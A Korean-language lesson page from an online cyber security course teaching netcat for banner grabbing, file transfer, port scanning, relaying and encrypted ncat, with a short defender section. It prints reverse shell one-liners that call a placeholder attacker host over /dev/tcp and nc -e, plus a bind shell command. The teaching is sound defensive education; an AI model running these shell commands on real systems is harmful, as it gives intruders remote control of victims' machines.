0Pricing
Cyber Security Academy · 강의

Netcat: 스위스 아미 나이프

nc를 사용해 배너를 확인하고 파일을 전송하며 포트 포워딩과 간단한 리버스 셸을 수행합니다.

Netcat: 스위스 아미 나이프은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 3번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

넷캣이란 무엇입니까

넷캣은 TCP 또는 UDP를 사용하여 네트워크 연결을 통해 데이터를 읽고 쓰는 유틸리티입니다. 거의 모든 유닉스 시스템에 설치되어 있으며, 문제 해결, 파일 전송, 기본적인 취약점 악용에 매우 유용합니다.

기본 연결 및 서비스 배너 수집

임의의 TCP 포트에 연결하여 서비스 배너를 수집하고 프로토콜과 수동으로 상호 작용할 수 있습니다. 가장 간단한 형태의 정찰입니다.

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

포트에서 수신 대기

넷캣은 -l -p를 사용하여 들어오는 연결을 수신 대기할 수 있습니다. 연결성 점검, 역방향 셸 수신, 파일 수신에 유용합니다.

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

넷캣을 이용한 파일 전송

넷캣은 파일을 연결로 전달하여 전송할 수 있습니다. 수신 측은 수신 대기하면서 출력을 파일로 리디렉션합니다. 암호화되지 않으므로 신뢰할 수 있는 네트워크에서만 사용하십시오.

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

넷캣을 이용한 포트 탐색

넷캣은 -z(입출력 없음 모드)와 -w(시간 초과)를 사용하여 기본적인 포트 탐색을 수행할 수 있습니다. 엔맵보다 느리지만 엔맵을 사용할 수 없을 때 유용합니다.

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

간단한 역방향 셸

역방향 셸은 대상이 공격자에게 다시 연결하도록 합니다. 방화벽 규칙이 대상에 대한 인바운드 연결을 차단할 때 침투 점검에 유용합니다.

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

바인드 셸

바인드 셸은 대상 시스템에서 수신 대기합니다. 공격자는 해당 셸에 연결합니다. 현대적인 침투 점검에서는 방화벽이 일반적으로 인바운드 연결을 차단하므로 사용 빈도가 낮습니다.

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

UDP 모드

UDP 연결에는 -u를 사용하십시오. DNS(포트 53)와 SNMP(포트 161) 같은 UDP 서비스를 점검할 때 유용합니다.

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

넷캣을 이용한 프록시 연결

넷캣은 네트워크를 거쳐 이동할 수 있도록 연결을 연쇄할 수 있습니다. 명명된 파이프(mkfifo)와 함께 사용하면 추가 도구 없이 간단한 양방향 터널을 만들 수 있습니다.

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

엔캣: 현대적인 대안

엔캣은 엔맵에 포함되어 있으며 SSL 지원(--ssl), 액세스 제어, 중개 모드로 넷캣의 기능을 확장합니다. 암호화된 채널에는 엔캣을 사용하는 것이 좋습니다.

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

방어자: 넷캣 탐지

넷캣 연결은 일반적인 TCP 연결처럼 보입니다. 방어자는 프로세스 이름 모니터링(HIDS), 비정상적인 아웃바운드 포트, 예상하지 못한 상위 프로세스에서 생성된 셸을 통해 넷캣을 탐지합니다.

빠른 확인

수신 대기 모드를 활성화하는 넷캣 플래그는 무엇입니까?

요약: 넷캣

넷캣은 기본적인 도구입니다. 서비스 배너 수집, 파일 전송, 연결성 점검, 역방향 셸과 바인드 셸의 작동 방식 이해에 사용하십시오. 승인된 침투 점검에서는 방화벽 규칙을 검증하고 공격자의 네트워크 이동을 모의할 수 있습니다. 넷캣을 사용하는 방법과 탐지하는 방법을 모두 익히십시오.

자주 묻는 질문

“Netcat: 스위스 아미 나이프” 강의는 무료인가요?

네 — “Netcat: 스위스 아미 나이프” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

“Netcat: 스위스 아미 나이프”에서 뭘 배우나요?

nc를 사용해 배너를 확인하고 파일을 전송하며 포트 포워딩과 간단한 리버스 셸을 수행합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.

Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?

사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 3번째 강의입니다.

“Netcat: 스위스 아미 나이프” 강의는 얼마나 걸리나요?

대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.

이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?

네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.

이 강의의 모든 강의

  1. Nmap 포트 스캔 기법
  2. 서비스와 OS 핑거프린팅
  3. Netcat: 스위스 아미 나이프
  4. 네트워크 열거 스크립팅
← Cyber Security Academy(으)로 돌아가기